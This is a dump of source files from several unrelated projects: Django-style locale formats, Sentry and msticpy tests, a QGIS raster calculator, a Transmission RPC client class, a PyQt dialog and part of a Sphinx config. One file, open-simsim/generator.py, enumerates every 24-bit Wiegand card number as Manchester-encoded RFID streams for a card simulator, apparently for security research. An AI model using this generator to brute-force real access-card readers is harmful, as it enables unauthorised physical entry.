# '%d %b %Y', '%d %b %y', # '20 jan 2009', '20 jan 09'
# '%d %B %Y', '%d %B %y', # '20 januari 2009', '20 januari 09'
]
# Kept ISO formats as one is in first position
TIME_INPUT_FORMATS = [
'%H:%M:%S', # '15:23:35'
'%H:%M:%S.%f', # '15:23:35.000200'
'%H.%M:%S', # '15.23:35'
'%H.%M:%S.%f', # '15.23:35.000200'
'%H.%M', # '15.23'
'%H:%M', # '15:23'
]
DATETIME_INPUT_FORMATS = [
# With time in %H:%M:%S :
'%d-%m-%Y %H:%M:%S', '%d-%m-%y %H:%M:%S', '%Y-%m-%d %H:%M:%S',
# '20-01-2009 15:23:35', '20-01-09 15:23:35', '2009-01-20 15:23:35'
'%d/%m/%Y %H:%M:%S', '%d/%m/%y %H:%M:%S', '%Y/%m/%d %H:%M:%S',
# '20/01/2009 15:23:35', '20/01/09 15:23:35', '2009/01/20 15:23:35'
# '%d %b %Y %H:%M:%S', '%d %b %y %H:%M:%S', # '20 jan 2009 15:23:35', '20 jan 09 15:23:35'
# '%d %B %Y %H:%M:%S', '%d %B %y %H:%M:%S', # '20 januari 2009 15:23:35', '20 januari 2009 15:23:35'
# With time in %H:%M:%S.%f :
'%d-%m-%Y %H:%M:%S.%f', '%d-%m-%y %H:%M:%S.%f', '%Y-%m-%d %H:%M:%S.%f',
# '20-01-2009 15:23:35.000200', '20-01-09 15:23:35.000200', '2009-01-20 15:23:35.000200'
'%d/%m/%Y %H:%M:%S.%f', '%d/%m/%y %H:%M:%S.%f', '%Y/%m/%d %H:%M:%S.%f',
# '20/01/2009 15:23:35.000200', '20/01/09 15:23:35.000200', '2009/01/20 15:23:35.000200'
# With time in %H.%M:%S :
'%d-%m-%Y %H.%M:%S', '%d-%m-%y %H.%M:%S', # '20-01-2009 15.23:35', '20-01-09 15.23:35'
'%d/%m/%Y %H.%M:%S', '%d/%m/%y %H.%M:%S', # '20/01/2009 15.23:35', '20/01/09 15.23:35'
# '%d %b %Y %H.%M:%S', '%d %b %y %H.%M:%S', # '20 jan 2009 15.23:35', '20 jan 09 15.23:35'
# '%d %B %Y %H.%M:%S', '%d %B %y %H.%M:%S', # '20 januari 2009 15.23:35', '20 januari 2009 15.23:35'
# With time in %H.%M:%S.%f :
'%d-%m-%Y %H.%M:%S.%f', '%d-%m-%y %H.%M:%S.%f', # '20-01-2009 15.23:35.000200', '20-01-09 15.23:35.000200'
'%d/%m/%Y %H.%M:%S.%f', '%d/%m/%y %H.%M:%S.%f', # '20/01/2009 15.23:35.000200', '20/01/09 15.23:35.000200'
# With time in %H:%M :
'%d-%m-%Y %H:%M', '%d-%m-%y %H:%M', '%Y-%m-%d %H:%M', # '20-01-2009 15:23', '20-01-09 15:23', '2009-01-20 15:23'
'%d/%m/%Y %H:%M', '%d/%m/%y %H:%M', '%Y/%m/%d %H:%M', # '20/01/2009 15:23', '20/01/09 15:23', '2009/01/20 15:23'
# '%d %b %Y %H:%M', '%d %b %y %H:%M', # '20 jan 2009 15:23', '20 jan 09 15:23'
# '%d %B %Y %H:%M', '%d %B %y %H:%M', # '20 januari 2009 15:23', '20 januari 2009 15:23'
# With time in %H.%M :
'%d-%m-%Y %H.%M', '%d-%m-%y %H.%M', # '20-01-2009 15.23', '20-01-09 15.23'
'%d/%m/%Y %H.%M', '%d/%m/%y %H.%M', # '20/01/2009 15.23', '20/01/09 15.23'
# '%d %b %Y %H.%M', '%d %b %y %H.%M', # '20 jan 2009 15.23', '20 jan 09 15.23'
# '%d %B %Y %H.%M', '%d %B %y %H.%M', # '20 januari 2009 15.23', '20 januari 2009 15.23'
# Without time :
'%d-%m-%Y', '%d-%m-%y', '%Y-%m-%d', # '20-01-2009', '20-01-09', '2009-01-20'
'%d/%m/%Y', '%d/%m/%y', '%Y/%m/%d', # '20/01/2009', '20/01/09', '2009/01/20'
# '%d %b %Y', '%d %b %y', # '20 jan 2009', '20 jan 09'
# '%d %B %Y', '%d %B %y', # '20 januari 2009', '20 januari 2009'
]
DECIMAL_SEPARATOR = ','
THOUSAND_SEPARATOR = '.'
NUMBER_GROUPING = 3
|
BuildingLink/sentry
|
refs/heads/master
|
tests/sentry/web/frontend/test_mailgun_inbound_webhook.py
|
6
|
from __future__ import absolute_import, print_function
import mock
from django.core.urlresolvers import reverse
from sentry.testutils import TestCase
from sentry.utils.email import group_id_to_email
body_plain = "foo bar"
class TestMailgunInboundWebhookView(TestCase):
def setUp(self):
super(TestMailgunInboundWebhookView, self).setUp()
self.event = self.create_event(event_id='a' * 32)
self.mailto = group_id_to_email(self.group.pk)
@mock.patch('sentry.web.frontend.mailgun_inbound_webhook.process_inbound_email')
def test_invalid_signature(self, process_inbound_email):
with self.options({'mail.mailgun-api-key': 'a' * 32}):
resp = self.client.post(reverse('sentry-mailgun-inbound-hook'), {
'recipient': self.mailto,
'sender': self.user.email,
'body-plain': body_plain,
'signature': '',
'token': '',
'timestamp': '',
})
assert resp.status_code == 200
@mock.patch('sentry.web.frontend.mailgun_inbound_webhook.process_inbound_email')
def test_missing_api_key(self, process_inbound_email):
resp = self.client.post(reverse('sentry-mailgun-inbound-hook'), {
'recipient': self.mailto,
'sender': self.user.email,
'body-plain': body_plain,
'signature': '',
'token': '',
'timestamp': '',
})
assert resp.status_code == 500
@mock.patch('sentry.web.frontend.mailgun_inbound_webhook.process_inbound_email')
def test_simple(self, process_inbound_email):
token = 'a' * 50
timestamp = '1422513193'
signature = '414a4705e6c12a39905748549f9135fbe8b739a5b12b2349ee40f31d3ee12f83'
with self.options({'mail.mailgun-api-key': 'a' * 32}):
resp = self.client.post(reverse('sentry-mailgun-inbound-hook'), {
'recipient': self.mailto,
'sender': self.user.email,
'body-plain': body_plain,
'signature': signature,
'token': token,
'timestamp': timestamp,
})
assert resp.status_code == 201
process_inbound_email.delay.assert_called_once_with(
self.user.email,
self.group.id,
body_plain,
)
|
VirusTotal/msticpy
|
refs/heads/master
|
tests/test_nbdisplay.py
|
1
|
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
import unittest
import os
from pathlib import Path
import nbformat
from nbconvert.preprocessors import ExecutePreprocessor, CellExecutionError
import pytest
_NB_FOLDER = "docs/notebooks"
_NB_NAME = "EventClustering.ipynb"
class Testnbdisplay(unittest.TestCase):
"""Unit test class."""
@pytest.mark.skipif(
not os.environ.get("MSTICPY_TEST_NOSKIP"), reason="Skipped for local tests."
)
def test_clustering_nbdisplay_notebook(self):
nb_path = Path(_NB_FOLDER).joinpath(_NB_NAME)
abs_path = Path(_NB_FOLDER).absolute()
with open(nb_path) as f:
nb = nbformat.read(f, as_version=4)
ep = ExecutePreprocessor(timeout=600, kernel_name="python3")
try:
ep.preprocess(nb, {"metadata": {"path": abs_path}})
except CellExecutionError:
nb_err = str(nb_path).replace(".ipynb", "-err.ipynb")
msg = f"Error executing the notebook '{nb_path}'.\n"
msg += f"See notebook '{nb_err}' for the traceback."
print(msg)
with open(nb_err, mode="w", encoding="utf-8") as f:
nbformat.write(nb, f)
raise
|
geopython/QGIS
|
refs/heads/master
|
python/plugins/processing/algs/qgis/RasterCalculator.py
|
2
|
# -*- coding: utf-8 -*-
"""
***************************************************************************
RasterLayerCalculator.py
---------------------
Date : November 2016
Copyright : (C) 2016 by Victor Olaya
Email : volayaf at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Victor Olaya'
__date__ = 'November 2016'
__copyright__ = '(C) 2016, Victor Olaya'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import os
import math
from processing.algs.qgis.QgisAlgorithm import QgisAlgorithm
from processing.algs.gdal.GdalUtils import GdalUtils
from qgis.core import (QgsProcessing,
QgsProcessingException,
QgsProcessingUtils,
QgsProcessingParameterCrs,
QgsProcessingParameterMultipleLayers,
QgsProcessingParameterNumber,
QgsProcessingParameterExtent,
QgsProcessingParameterRasterDestination,
QgsProcessingParameterRasterLayer,
QgsProcessingOutputRasterLayer,
QgsProcessingParameterString,
QgsCoordinateTransform,
QgsMapLayer)
from qgis.PyQt.QtCore import QObject
from qgis.analysis import QgsRasterCalculator, QgsRasterCalculatorEntry
class RasterCalculator(QgisAlgorithm):
LAYERS = 'LAYERS'
EXTENT = 'EXTENT'
CELLSIZE = 'CELLSIZE'
EXPRESSION = 'EXPRESSION'
CRS = 'CRS'
OUTPUT = 'OUTPUT'
def group(self):
return self.tr('Raster analysis')
def groupId(self):
return 'rasteranalysis'
def __init__(self):
super().__init__()
def initAlgorithm(self, config=None):
class ParameterRasterCalculatorExpression(QgsProcessingParameterString):
def __init__(self, name='', description='', multiLine=False):
super().__init__(name, description, multiLine=multiLine)
self.setMetadata({
'widget_wrapper': 'processing.algs.qgis.ui.RasterCalculatorWidgets.ExpressionWidgetWrapper'
})
def type(self):
return 'raster_calc_expression'
def clone(self):
return ParameterRasterCalculatorExpression(self.name(), self.description(), self.multiLine())
self.addParameter(ParameterRasterCalculatorExpression(self.EXPRESSION, self.tr('Expression'),
multiLine=True))
self.addParameter(QgsProcessingParameterMultipleLayers(self.LAYERS,
self.tr('Reference layer(s) (used for automated extent, cellsize, and CRS)'),
layerType=QgsProcessing.TypeRaster,
optional=True))
self.addParameter(QgsProcessingParameterNumber(self.CELLSIZE,
self.tr('Cell size (use 0 or empty to set it automatically)'),
type=QgsProcessingParameterNumber.Double,
minValue=0.0, defaultValue=0.0, optional=True))
self.addParameter(QgsProcessingParameterExtent(self.EXTENT,
self.tr('Output extent'),
optional=True))
self.addParameter(QgsProcessingParameterCrs(self.CRS, 'Output CRS', optional=True))
self.addParameter(QgsProcessingParameterRasterDestination(self.OUTPUT, self.tr('Output')))
def name(self):
return 'rastercalculator'
def displayName(self):
return self.tr('Raster calculator')
def processAlgorithm(self, parameters, context, feedback):
expression = self.parameterAsString(parameters, self.EXPRESSION, context)
layers = self.parameterAsLayerList(parameters, self.LAYERS, context)
layersDict = {}
if layers:
layersDict = {lyr.source(): lyr for lyr in layers}
crs = self.parameterAsCrs(parameters, self.CRS, context)
if crs is None or not crs.isValid():
if not layers:
raise QgsProcessingException(self.tr("No reference layer selected nor CRS provided"))
else:
crs = list(layersDict.values())[0].crs()
bbox = self.parameterAsExtent(parameters, self.EXTENT, context)
if bbox.isNull() and not layers:
raise QgsProcessingException(self.tr("No reference layer selected nor extent box provided"))
if not bbox.isNull():
bboxCrs = self.parameterAsExtentCrs(parameters, self.EXTENT, context)
if bboxCrs != crs:
transform = QgsCoordinateTransform(bboxCrs, crs, context.project())
bbox = transform.transformBoundingBox(bbox)
if bbox.isNull() and layers:
bbox = QgsProcessingUtils.combineLayerExtents(layers, crs)
cellsize = self.parameterAsDouble(parameters, self.CELLSIZE, context)
if cellsize == 0 and not layers:
raise QgsProcessingException(self.tr("No reference layer selected nor cellsize value provided"))
def _cellsize(layer):
ext = layer.extent()
if layer.crs() != crs:
transform = QgsCoordinateTransform(layer.crs(), crs, context.project())
ext = transform.transformBoundingBox(ext)
return (ext.xMaximum() - ext.xMinimum()) / layer.width()
if cellsize == 0:
cellsize = min([_cellsize(lyr) for lyr in layersDict.values()])
# check for layers available in the model
layersDictCopy = layersDict.copy() # need a shallow copy because next calls invalidate iterator
for lyr in layersDictCopy.values():
expression = self.mappedNameToLayer(lyr, expression, layersDict, context)
# check for layers available in the project
for lyr in QgsProcessingUtils.compatibleRasterLayers(context.project()):
expression = self.mappedNameToLayer(lyr, expression, layersDict, context)
# create the list of layers to be passed as inputs to RasterCalculaltor
# at this phase expression has been modified to match available layers
# in the current scope
entries = []
for name, lyr in layersDict.items():
for n in range(lyr.bandCount()):
ref = '{:s}@{:d}'.format(name, n + 1)
if ref in expression:
entry = QgsRasterCalculatorEntry()
entry.ref = ref
entry.raster = lyr
entry.bandNumber = n + 1
entries.append(entry)
# Append any missing entry from the current project
for entry in QgsRasterCalculatorEntry.rasterEntries():
if not [e for e in entries if e.ref == entry.ref]:
entries.append(entry)
output = self.parameterAsOutputLayer(parameters, self.OUTPUT, context)
width = round((bbox.xMaximum() - bbox.xMinimum()) / cellsize)
height = round((bbox.yMaximum() - bbox.yMinimum()) / cellsize)
driverName = GdalUtils.getFormatShortNameFromFilename(output)
calc = QgsRasterCalculator(expression,
output,
driverName,
bbox,
crs,
width,
height,
entries)
res = calc.processCalculation(feedback)
if res == QgsRasterCalculator.ParserError:
raise QgsProcessingException(self.tr("Error parsing formula"))
return {self.OUTPUT: output}
def processBeforeAddingToModeler(self, algorithm, model):
values = []
expression = algorithm.params[self.EXPRESSION]
for i in list(model.inputs.values()):
param = i.param
if isinstance(param, QgsProcessingParameterRasterLayer) and "{}@".format(param.name) in expression:
values.append(ValueFromInput(param.name()))
if algorithm.name:
dependent = model.getDependentAlgorithms(algorithm.name)
else:
dependent = []
for alg in list(model.algs.values()):
if alg.modeler_name not in dependent:
for out in alg.algorithm.outputs:
if (isinstance(out, QgsProcessingOutputRasterLayer) and
"{}:{}@".format(alg.modeler_name, out.name) in expression):
values.append(ValueFromOutput(alg.modeler_name, out.name))
algorithm.params[self.LAYERS] = values
def mappedNameToLayer(self, lyr, expression, layersDict, context):
'''Try to identify if a real layer is mapped in the expression with a symbolic name.'''
nameToMap = lyr.source()
# check if nameToMap is a file
# TODO: what about URI eg for a COG?
if os.path.isfile(nameToMap):
# get only the name without extension and path of the file
nameToMap = os.path.splitext(os.path.basename(nameToMap))[0]
# check for layers directly added in the expression
if (nameToMap + "@") in expression:
layersDict[nameToMap] = lyr
# get "algorithm_inputs" scope of the expressionContext related
# with mapped variables
indexOfScope = context.expressionContext().indexOfScope("algorithm_inputs")
if indexOfScope >= 0:
expContextAlgInputsScope = context.expressionContext().scope(indexOfScope)
# check for the layers that are mapped as input in a model
# to do this check in the latest scope all passed variables
# to look for a variable that is a layer or a string filename
# to a layer
varDescription = None
for varName in expContextAlgInputsScope.variableNames():
layerInContext = expContextAlgInputsScope.variable(varName)
if not isinstance(layerInContext, str) and not isinstance(layerInContext, QgsMapLayer):
continue
if isinstance(layerInContext, QgsMapLayer) and nameToMap not in layerInContext.source():
continue
varDescription = expContextAlgInputsScope.description(varName)
# because there can be variable with None or "" description
# then skip them
if not varDescription:
continue
# check if it's description starts with Output as in:
# Output 'Output' from algorithm 'calc1'
# as set in https://github.com/qgis/QGIS/blob/master/src/core/processing/models/qgsprocessingmodelalgorithm.cpp#L516
# but var in expression is called simply
# 'Output' from algorithm 'calc1'
# get the translation string to use to parse the description
# HAVE to use the same translated string as in
# https://github.com/qgis/QGIS/blob/master/src/core/processing/models/qgsprocessingmodelalgorithm.cpp#L516
translatedDesc = self.tr("Output '%1' from algorithm '%2'")
elementZero = translatedDesc.split(" ")[0] # For english the string result should be "Output"
elements = varDescription.split(" ")
if len(elements) > 1 and elements[0] == elementZero:
# remove heading QObject.tr"Output ") string. Note adding a space at the end of elementZero!
varDescription = varDescription[len(elementZero) + 1:]
# check if cleaned varDescription is present in the expression
# if not skip it
if (varDescription + "@") not in expression:
continue
# !!!found!!! => substitute in expression
# and add in the list of layers that will be passed to raster calculator
nameToMap = varName
new = "{}@".format(nameToMap)
old = "{}@".format(varDescription)
expression = expression.replace(old, new)
layersDict[nameToMap] = lyr
# need return the modified expression because it's not a reference
return expression
|
ouspg/ridac
|
refs/heads/master
|
open-simsim/generator.py
|
1
|
import time
import os
toInts = lambda l: [int(i) for i in l]
takeOne = lambda l,n: [i[n] for i in l]
heads = lambda l: [l[i:] for i in range(len(l))]
tails = lambda l: [l[:i+1] for i in range(len(l))]
concat = lambda l: [j for i in l for j in i]
toStr = lambda i: "".join(map(str,i))
"""the IEEE 802.5"""
standardManchester = lambda b:[ [0,1],[1,0]][b]
startSeq = [0,0,0,1,1,1]
manchester = lambda bits: startSeq + concat( [
standardManchester(i) for i in bits
])
evenBit = lambda bits: sum(bits )%2
oddBit = lambda bits: ( evenBit(bits) +1 )%2
wiegandParities = lambda bits: concat([
[evenBit(bits[:12])],
bits[:12],
bits[12:],
[oddBit(bits[12:])]
])
manchesterDecode = lambda k : [ v for i,v in enumerate(k[6:]) if i%2 == 0]
def printDataValues (s, printVals = True):
d = {}
d['allBits'] = s
d['frameStart'] = s[:19]
d['wiegandData'] = s[19:]
d['firstBlock'] = s[19:32]
d['secondBlock'] = s[33:45]
d['evenBit'] = s[19]
d['oddBit'] = s[44]
d['facilityCode'] = s[20:28]
d['firstPartOfCardnumber'] = s[28:32]
d['secondPartOfCardNumber'] = s[33:44]
d['facilityCodeAsInteger'] = toInteger(toInts(d['facilityCode']))
d['firstPartNmbrAsInteger'] = toInteger(toInts(d['firstPartOfCardnumber']))
d['secondPartNmbAsInteger'] = toInteger(toInts(d['secondPartOfCardNumber']))
d['cardNumberAsInteger'] = toInteger(toInts(s[28:44]))
d['wiegandDataAsInteger'] = toInteger(toInts(s[20:44]))
print """
* Read manchester decoded bit sequence:
%(allBits)s
* protocol information, wiegand data:
%(frameStart)s, %(wiegandData)s
* first wiegand block, second wiegand block:
%(firstBlock)s, %(secondBlock)s
* evenBit, facility code, 1. part of the card number, 2. part of the card number, odd bit:
%(evenBit)s, %(facilityCode)s, %(firstPartOfCardnumber)s, %(secondPartOfCardNumber)s, %(oddBit)s
* integer conversions:
* facility number, 1. part of the card number, 2. part of the card number,
%(facilityCodeAsInteger)s,%(firstPartNmbrAsInteger)s,%(secondPartNmbAsInteger)s,
* combined card number as integer:
%(cardNumberAsInteger)s
* whole wiegand data block as an integer:
%(wiegandDataAsInteger)s
"""%d
standardFrameStart = [0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1]
dataFrame = lambda data: standardFrameStart + wiegandParities(data)
def tobits(x,digits=16):
r = []
for i in range(digits):
r.insert(0,x % 2)
x >>= 1
return r
toInteger = lambda k: sum([v*2**(len(k)-1-i) for i,v in enumerate(k)])
def makeKeyFromInteger(i):
return manchester(dataFrame(tobits(i,digits=24)))
def yieldAllKeysInOrder(start=0, stop=2**24):
for i in range(start, stop):
yield makeKeyFromInteger(i)
toBCD = lambda n: [ toStr(tobits(int(d),4)) for d in str(n) ]
def binSearch(n):
m = 2**n
i = m / 2
yield 0
yield m-1
while i >= 1:
moduloCnt = 0
index = 0
while index < m:
index += i
if moduloCnt % 2 == 0:
yield index
moduloCnt += 1
i /= 2
def yieldAllKeysInBinarySearchFashion():
for i in binSearch(24):
yield makeKeyFromInteger(i)
def writeKeyBlockToFile(generator,
fname= "keytest.txt",
start = 0,
stop = 2**24,
repeats = 1
):
t1 = time.time()
tmpfilename = os.tempnam(".")
f = open(tmpfilename, "w")
cnt = 0
for bitString in generator:
for r in range(repeats):
f.write(toStr(bitString))
f.flush()
if cnt > stop - start - 1:
print cnt,bitString
break
cnt += 1
f.close()
t2 = time.time()
print 'generation time:', t2 - t1
#print open(tmpfilename).read()
while os.path.exists(fname):
"""this 0.041 is the time that it takes to send a one key seqv"""
pollingTime = 2 #repeats * 0.041 * ( stop - start ) / 2.0
print pollingTime
time.sleep(pollingTime)
os.rename(tmpfilename, fname)
|
gboudreau/CouchPotato
|
refs/heads/master
|
library/transmissionrpc/torrent.py
|
10
|
# -*- coding: utf-8 -*-
# Copyright (c) 2008-2010 Erik Svensson <erik.public@gmail.com>
# Licensed under the MIT license.
import sys, datetime
from transmissionrpc.constants import STATUS, PRIORITY
from transmissionrpc.utils import format_timedelta
class Torrent(object):
"""
Torrent is a class holding the data raceived from Transmission regarding a bittorrent transfer.
All fetched torrent fields are accessable through this class using attributes.
This class has a few convenience properties using the torrent data.
"""
def __init__(self, client, fields):
if 'id' not in fields:
raise ValueError('Torrent requires an id')
self.fields = {}
self.update(fields)
self.client = client
def _getNameString(self, codec=None):
if codec == None:
codec = sys.getdefaultencoding()
name = None
# try to find name
if 'name' in self.fields:
name = self.fields['name']
# if name is unicode, try to decode
if isinstance(name, unicode):
try:
name = name.encode(codec)
except UnicodeError:
name = None
return name
def __repr__(self):
tid = self.fields['id']
name = self._getNameString()
if isinstance(name, str):
return '<Torrent %d \"%s\">' % (tid, name)
else:
return '<Torrent %d>' % (tid)
def __str__(self):
name = self._getNameString()
if isinstance(name, str):
return 'Torrent \"%s\"' % (name)
else:
return 'Torrent'
def __copy__(self):
return Torrent(self.client, self.fields)
def update(self, other):
"""
Update the torrent data from a Transmission JSON-RPC arguments dictinary
"""
fields = None
if isinstance(other, dict):
fields = other
elif isinstance(other, Torrent):
fields = other.fields
else:
raise ValueError('Cannot update with supplied data')
for key, value in fields.iteritems():
self.fields[key.replace('-', '_')] = value
def files(self):
"""
Get list of files for this torrent.
This function returns a dictionary with file information for each file.
The file information is has following fields:
::
{
<file id>: {
'name': <file name>,
'size': <file size in bytes>,
'completed': <bytes completed>,
'priority': <priority ('high'|'normal'|'low')>,
'selected': <selected for download>
}
...
}
"""
result = {}
if 'files' in self.fields:
indicies = xrange(len(self.fields['files']))
files = self.fields['files']
priorities = self.fields['priorities']
wanted = self.fields['wanted']
for item in zip(indicies, files, priorities, wanted):
selected = True if item[3] else False
priority = PRIORITY[item[2]]
result[item[0]] = {
'selected': selected,
'priority': priority,
'size': item[1]['length'],
'name': item[1]['name'],
'completed': item[1]['bytesCompleted']}
return result
def __getattr__(self, name):
try:
return self.fields[name]
except KeyError:
raise AttributeError('No attribute %s' % name)
@property
def status(self):
"""
Returns the torrent status. Is either one of 'check pending', 'checking',
'downloading', 'seeding' or 'stopped'. The first two is related to
verification.
"""
return STATUS[self.fields['status']]
@property
def progress(self):
"""Get the download progress in percent."""
try:
return 100.0 * (self.fields['sizeWhenDone'] - self.fields['leftUntilDone']) / float(self.fields['sizeWhenDone'])
except ZeroDivisionError:
return 0.0
@property
def ratio(self):
"""Get the upload/download ratio."""
try:
return self.fields['uploadedEver'] / float(self.fields['downloadedEver'])
except ZeroDivisionError:
return 0.0
@property
def eta(self):
"""Get the "eta" as datetime.timedelta."""
eta = self.fields['eta']
if eta >= 0:
return datetime.timedelta(seconds=eta)
else:
ValueError('eta not valid')
@property
def date_active(self):
"""Get the attribute "activityDate" as datetime.datetime."""
return datetime.datetime.fromtimestamp(self.fields['activityDate'])
@property
def date_added(self):
"""Get the attribute "addedDate" as datetime.datetime."""
return datetime.datetime.fromtimestamp(self.fields['addedDate'])
@property
def date_started(self):
"""Get the attribute "startDate" as datetime.datetime."""
return datetime.datetime.fromtimestamp(self.fields['startDate'])
@property
def date_done(self):
"""Get the attribute "doneDate" as datetime.datetime."""
return datetime.datetime.fromtimestamp(self.fields['doneDate'])
def format_eta(self):
"""
Returns the attribute *eta* formatted as a string.
* If eta is -1 the result is 'not available'
* If eta is -2 the result is 'unknown'
* Otherwise eta is formatted as <days> <hours>:<minutes>:<seconds>.
"""
eta = self.fields['eta']
if eta == -1:
return 'not available'
elif eta == -2:
return 'unknown'
else:
return format_timedelta(self.eta)
@property
def priority(self):
"""
Get the priority as string.
Can be one of 'low', 'normal', 'high'.
"""
return PRIORITY[self.fields['bandwidthPriority']]
|
pablosuau/pyBacklogger
|
refs/heads/master
|
views/filter_dialog.py
|
1
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'filter_dialog.ui'
#
# Created by: PyQt5 UI code generator 5.9
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_FilterDialog(object):
def setupUi(self, FilterDialog):
FilterDialog.setObjectName("FilterDialog")
FilterDialog.resize(255, 368)
FilterDialog.setMinimumSize(QtCore.QSize(255, 368))
FilterDialog.setMaximumSize(QtCore.QSize(255, 368))
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap(":/app_icon/shelf.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
FilterDialog.setWindowIcon(icon)
self.tabCategory = QtWidgets.QTabWidget(FilterDialog)
self.tabCategory.setGeometry(QtCore.QRect(0, 0, 401, 321))
self.tabCategory.setTabShape(QtWidgets.QTabWidget.Rounded)
self.tabCategory.setObjectName("tabCategory")
self.tabSystem = QtWidgets.QWidget()
self.tabSystem.setObjectName("tabSystem")
self.pushButtonDeselectAllSystem = QtWidgets.QPushButton(self.tabSystem)
self.pushButtonDeselectAllSystem.setGeometry(QtCore.QRect(90, 7, 75, 23))
self.pushButtonDeselectAllSystem.setObjectName("pushButtonDeselectAllSystem")
self.pushButtonSelectAllSystem = QtWidgets.QPushButton(self.tabSystem)
self.pushButtonSelectAllSystem.setGeometry(QtCore.QRect(10, 7, 75, 23))
self.pushButtonSelectAllSystem.setObjectName("pushButtonSelectAllSystem")
self.listSystem = QtWidgets.QListView(self.tabSystem)
self.listSystem.setGeometry(QtCore.QRect(10, 40, 231, 241))
self.listSystem.setObjectName("listSystem")
self.tabCategory.addTab(self.tabSystem, "")
self.tabStatus = QtWidgets.QWidget()
self.tabStatus.setObjectName("tabStatus")
self.pushButtonDeselectAllStatus = QtWidgets.QPushButton(self.tabStatus)
self.pushButtonDeselectAllStatus.setGeometry(QtCore.QRect(90, 7, 75, 23))
self.pushButtonDeselectAllStatus.setObjectName("pushButtonDeselectAllStatus")
self.pushButtonSelectAllStatus = QtWidgets.QPushButton(self.tabStatus)
self.pushButtonSelectAllStatus.setGeometry(QtCore.QRect(10, 7, 75, 23))
self.pushButtonSelectAllStatus.setObjectName("pushButtonSelectAllStatus")
self.listStatus = QtWidgets.QListView(self.tabStatus)
self.listStatus.setGeometry(QtCore.QRect(10, 40, 231, 241))
self.listStatus.setObjectName("listStatus")
self.tabCategory.addTab(self.tabStatus, "")
self.tabLabel = QtWidgets.QWidget()
self.tabLabel.setObjectName("tabLabel")
self.pushButtonDeselectAllLabel = QtWidgets.QPushButton(self.tabLabel)
self.pushButtonDeselectAllLabel.setGeometry(QtCore.QRect(90, 7, 75, 23))
self.pushButtonDeselectAllLabel.setObjectName("pushButtonDeselectAllLabel")
self.pushButtonSelectAllLabel = QtWidgets.QPushButton(self.tabLabel)
self.pushButtonSelectAllLabel.setGeometry(QtCore.QRect(10, 7, 75, 23))
self.pushButtonSelectAllLabel.setObjectName("pushButtonSelectAllLabel")
self.listLabel = QtWidgets.QListView(self.tabLabel)
self.listLabel.setGeometry(QtCore.QRect(10, 40, 231, 241))
self.listLabel.setObjectName("listLabel")
self.tabCategory.addTab(self.tabLabel, "")
self.tabDifficulty = QtWidgets.QWidget()
self.tabDifficulty.setObjectName("tabDifficulty")
self.pushButtonSelectAllDifficulty = QtWidgets.QPushButton(self.tabDifficulty)
self.pushButtonSelectAllDifficulty.setGeometry(QtCore.QRect(10, 7, 75, 23))
self.pushButtonSelectAllDifficulty.setObjectName("pushButtonSelectAllDifficulty")
self.pushButtonDeselectAllDifficulty = QtWidgets.QPushButton(self.tabDifficulty)
self.pushButtonDeselectAllDifficulty.setGeometry(QtCore.QRect(90, 7, 75, 23))
self.pushButtonDeselectAllDifficulty.setObjectName("pushButtonDeselectAllDifficulty")
self.listDifficulty = QtWidgets.QListView(self.tabDifficulty)
self.listDifficulty.setGeometry(QtCore.QRect(10, 40, 231, 241))
self.listDifficulty.setObjectName("listDifficulty")
self.tabCategory.addTab(self.tabDifficulty, "")
self.pushButtonCancel = QtWidgets.QPushButton(FilterDialog)
self.pushButtonCancel.setGeometry(QtCore.QRect(170, 330, 75, 23))
self.pushButtonCancel.setObjectName("pushButtonCancel")
self.pushButtonOk = QtWidgets.QPushButton(FilterDialog)
self.pushButtonOk.setGeometry(QtCore.QRect(90, 330, 75, 23))
self.pushButtonOk.setObjectName("pushButtonOk")
self.retranslateUi(FilterDialog)
self.tabCategory.setCurrentIndex(0)
QtCore.QMetaObject.connectSlotsByName(FilterDialog)
def retranslateUi(self, FilterDialog):
_translate = QtCore.QCoreApplication.translate
FilterDialog.setWindowTitle(_translate("FilterDialog", "Filter"))
self.pushButtonDeselectAllSystem.setText(_translate("FilterDialog", "Deselect all"))
self.pushButtonSelectAllSystem.setText(_translate("FilterDialog", "Select all"))
self.tabCategory.setTabText(self.tabCategory.indexOf(self.tabSystem), _translate("FilterDialog", "System"))
self.pushButtonDeselectAllStatus.setText(_translate("FilterDialog", "Deselect all"))
self.pushButtonSelectAllStatus.setText(_translate("FilterDialog", "Select all"))
self.tabCategory.setTabText(self.tabCategory.indexOf(self.tabStatus), _translate("FilterDialog", "Status"))
self.pushButtonDeselectAllLabel.setText(_translate("FilterDialog", "Deselect all"))
self.pushButtonSelectAllLabel.setText(_translate("FilterDialog", "Select all"))
self.tabCategory.setTabText(self.tabCategory.indexOf(self.tabLabel), _translate("FilterDialog", "Label"))
self.pushButtonSelectAllDifficulty.setText(_translate("FilterDialog", "Select all"))
self.pushButtonDeselectAllDifficulty.setText(_translate("FilterDialog", "Deselect all"))
self.tabCategory.setTabText(self.tabCategory.indexOf(self.tabDifficulty), _translate("FilterDialog", "Difficulty"))
self.pushButtonCancel.setText(_translate("FilterDialog", "Cancel"))
self.pushButtonOk.setText(_translate("FilterDialog", "Ok"))
import views.app_icon_rc
|
jmenglund/pandas-validation
|
refs/heads/master
|
docs/source/conf.py
|
1
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# pandas-validation documentation build configuration file, created by
# sphinx-quickstart on Tue Jan 19 09:45:10 2016.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import sphinx_rtd_theme
from re import match
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
